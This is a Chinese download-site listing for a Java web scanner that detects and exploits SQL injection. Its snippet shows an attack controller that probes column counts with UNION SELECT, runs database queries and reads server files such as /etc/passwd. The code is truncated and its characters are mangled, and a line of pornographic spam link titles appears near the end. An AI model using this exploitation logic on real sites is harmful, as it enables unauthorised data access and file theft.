Web掃描SQL注入漏洞 Java版

大小: 40.05MB

文件類型: .rar

金幣: 1

下載: 0 次

發(fā)布日期: 2023-07-05
語言: Java
標(biāo)簽:

高速下載

資源簡介

帶源碼的Java版的web注入漏洞掃描工具

資源截圖

小圖大圖

代碼片段和文件信息

package?org.neatsee.webscan.attack;

/**SQL注入工具：
??*1.執(zhí)行SQL命令
??*2.讀取服務(wù)器上任意文件
??*
??*
??*功能:
??*SQLAttackController?sac?=?new?SQLAttackController（“http://www.example.com/a.php?a=a&b=b“）;
??*sac.detectRow（）;
??*sac.detectReflection（）;
??*sac.performAttack（“database（）“）;
??*sac.readFile（“/etc/passwd“）;
??*
??*使用組件:?掃描組件
?**/

import?org.neatsee.webscanner.scan.*;

public?class?SQLAttackController?{

	/**?type為整型或字符串*/
	protected?String?type;
	/**?urlAnlysis為GetAnalysis*/
	protected?GetAnalysis?urlAnalysis;
	/**?攻擊對(duì)象*/
	protected?String?param;
	/**?字段數(shù)*/
	protected?int?row;
	/**?未使用的暫存字段*/
	protected?int?htmllocl;
	/**?待注入的使用中的字段，要求字段正確*/
	protected?int?htmli;

	public?SQLAttackController（）?{
	}

	public?SQLAttackController（String?urlString）?throws?Exception?{
		try?{
			urlAnalysis?=?new?GetAnalysis（urlString）;
		}?catch?（Exception?e）?{
			/**?TODO?Auto-generated?catch?block*/
			throw?new?Exception（“ERROR:Failed?to?resolve?the?url“）;
		}
		/**?漏洞利用前的掃描*/
		SQL_injection_string?sis?=?new?SQL_injection_string（）;
		ScanResult?sr?=?null;
		if?（!sis.scan（urlString）.isEmpty（））?{
			/**?檢測到字符串注入漏洞*/
			sr?=?sis.scan（urlString）.iterator（）.next（）;
			type?=?“String“;
			param?=?sr.getVulnParam（）;
			return;
		}
		SQL_injection_integer?sii?=?new?SQL_injection_integer（）;
		if?（!sii.scan（urlString）.isEmpty（））?{
			/**?檢測到整型注入漏洞*/
			sr?=?sii.scan（urlString）.iterator（）.next（）;
			type?=?“Integer“;
			param?=?sr.getVulnParam（）;
			return;
		}?else?{
			System.out.println（“sdfdsfds“）;
			type?=?“Error“;
		}
	}

	/**?漏洞利用前的準(zhǔn)備，查找將注入的字段數(shù)*/
	public?Integer?detectRow（）?throws?Exception?{
		/**?保存舊的對(duì)象數(shù)據(jù)*/
		String?paramOld?=?urlAnalysis.getParam（param）;
		/**?非正常響應(yīng)*/
		String?errorPage;
		/**?用于將注入內(nèi)容組合進(jìn)目標(biāo)對(duì)象*/
		String?auto;
		auto?=?“?union?all?select?1“;
		try?{
			urlAnalysis.setParam（param?exploitCombiner（type?paramOld?auto））;
		}?catch?（Exception?e1）?{
			/**?TODO?Auto-generated?catch?block*/
			throw?new?Exception（“ERROR:Failed?to?set?param（unsupported?encoding?）“）;
		}
		try?{
			errorPage?=?urlAnalysis.getContent（）;
		}?catch?（Exception?e）?{
			/**?TODO?Auto-generated?catch?block*/
			throw?new?Exception（“ERROR:Failed?to?retrieve?the?content?from?server“）;
		}
		for?（int?i?=?2;?i?			auto?=?auto?+?““?+?i;

			String?tmp?=?exploitCombiner（type?paramOld?auto）;

			try?{
				urlAnalysis.setParam（param?tmp）;
			}?catch?（Exception?e1）?{
				/**?TODO?Auto-generated?catch?block*/
				throw?new?Exception（“ERROR:Failed?to?set?param（unsupported?encoding?）“）;
			}
			System.out.println（urlAnalysis.getUrlString（））;
			/**?長度檢測*/
			try?{
				if?（urlAnalysis.getContent（）.length（）?-?errorPage.length（）?!=?0）?{
					row?=?i;
					System.out.println（row）;
					/**?恢復(fù)對(duì)象*/
					urlAnalysis.setParam（param?paramOld）;
					return?row;
				}
			}?catch?（Exception?e）?{
				/**?TODO?Auto-generated?catch?block*/
				throw?new?Exception（“ERROR:Failed?to?retri

?屬性????????????大小?????日期????時(shí)間???名稱
-----------?---------??----------?-----??----

?????文件???????2194??2013-09-04?12:30??webscanner\.classpath

?????文件????????562??2013-08-26?14:31??webscanner\.project

?????文件????????119??2013-09-04?12:42??webscanner\.settings\org.eclipse.core.resources.prefs

?????文件???????7729??2013-09-04?12:38??webscanner\.settings\org.eclipse.jdt.core.prefs

?????文件?????????90??2013-08-26?14:31??webscanner\.settings\org.eclipse.m2e.core.prefs

?????文件??????????3??2013-08-26?14:33??webscanner\.svn\entries

?????文件??????????3??2013-08-26?14:33??webscanner\.svn\format

?????文件???????1972??2013-09-02?16:09??webscanner\.svn\pristine\00\00277ab596f4d610d4e8730cf7ce189b4ec7b16d.svn-base

?????文件????????447??2013-08-30?10:41??webscanner\.svn\pristine\00\003a5bf8146ece86d3c9551c5b5e9c08eac1bf74.svn-base

?????文件???????1131??2013-08-30?10:41??webscanner\.svn\pristine\00\00bf2f4f7978918aa0e39414d233bcd90d33bb7a.svn-base

?????文件????????194??2013-08-30?10:41??webscanner\.svn\pristine\00\00d2ab81a476ef967b7cfe1bf20ea31133fd24d6.svn-base

?????文件???????6304??2013-08-30?10:40??webscanner\.svn\pristine\01\014b948258f00f682aaa99b0389027c63ad4bb48.svn-base

?????文件???????9932??2013-08-30?10:41??webscanner\.svn\pristine\01\014bbc94fa0cd56b85a29037c3c4f6c135570ebd.svn-base

?????文件???????1992??2013-08-30?10:41??webscanner\.svn\pristine\01\01a953d25a67498bce9a164793376372e31b3e2f.svn-base

?????文件????????556??2013-08-30?10:41??webscanner\.svn\pristine\01\01c550a59e6d3a7a4b9134fd7a4dc37a3009a665.svn-base

?????文件???????2543??2013-08-28?12:49??webscanner\.svn\pristine\01\01cc8b1dc2ef44af025c642ceec002c0e78127ec.svn-base

?????文件????????731??2013-08-30?10:41??webscanner\.svn\pristine\02\023a02caf4a33df297100536e2fc579d7fcdc747.svn-base

?????文件???????1116??2013-08-30?10:40??webscanner\.svn\pristine\02\0244fa5e27455bd92ca1a17e443b091d7de28066.svn-base

?????文件???????2698??2013-08-30?10:41??webscanner\.svn\pristine\02\0259897a3b38789244aaebc88c17fb6b90b5f891.svn-base

?????文件???????2043??2013-08-30?10:41??webscanner\.svn\pristine\02\027701afbee70b130749442374aa02323acdca4b.svn-base

?????文件???????2215??2013-08-30?10:41??webscanner\.svn\pristine\02\02816ef70e8e7aec837a44b5e34b2f28b6dd3128.svn-base

?????文件???????1138??2013-08-30?10:41??webscanner\.svn\pristine\02\02a1d2a1a596f6a0e9f6bb9adf1af6727892d398.svn-base

?????文件????????311??2013-08-30?10:40??webscanner\.svn\pristine\02\02b094ba5de89c6cb5249e09137763b74c19a3ef.svn-base

?????文件???????1869??2013-08-30?10:40??webscanner\.svn\pristine\03\0339ca29b475d9657f8f1d3f557391f803292dc0.svn-base

?????文件???????1471??2013-08-30?10:41??webscanner\.svn\pristine\03\033bdefd08418e519743884b001b3cf4d8b7b0d7.svn-base

?????文件????????179??2013-08-30?10:41??webscanner\.svn\pristine\03\037e5e8cd7927f6b4e08e3057206e575d144730c.svn-base

?????文件???????1358??2013-08-30?10:41??webscanner\.svn\pristine\03\0384b5a756d3c6b6523f1fe3ff16f2e2bb9c746b.svn-base

?????文件????????458??2013-08-26?20:29??webscanner\.svn\pristine\03\03b1806f4a88290d98c06bce7d44f27e7d755ebe.svn-base

?????文件???????7282??2013-09-04?13:34??webscanner\.svn\pristine\03\03f7657948a907f9e5f85d117d08c197aec43fd0.svn-base

?????文件???????1676??2013-08-30?10:41??webscanner\.svn\pristine\04\04075447d6ace8ac3022b5b592dc7c746947f248.svn-base

............此處省略3373個(gè)文件信息

上一篇：使用ssh框架，實(shí)現(xiàn)單表增刪改查、條件查詢和分頁、文件上傳
下一篇：JCO3.0Dll及API文檔資料

評(píng)論

共有條評(píng)論

91av视频/亚洲h视频/操亚洲美女/外国一级黄色毛片 - 国产三级三级三级三级

Web掃描SQL注入漏洞 Java版

資源簡介

資源截圖

代碼片段和文件信息

評(píng)論

相關(guān)資源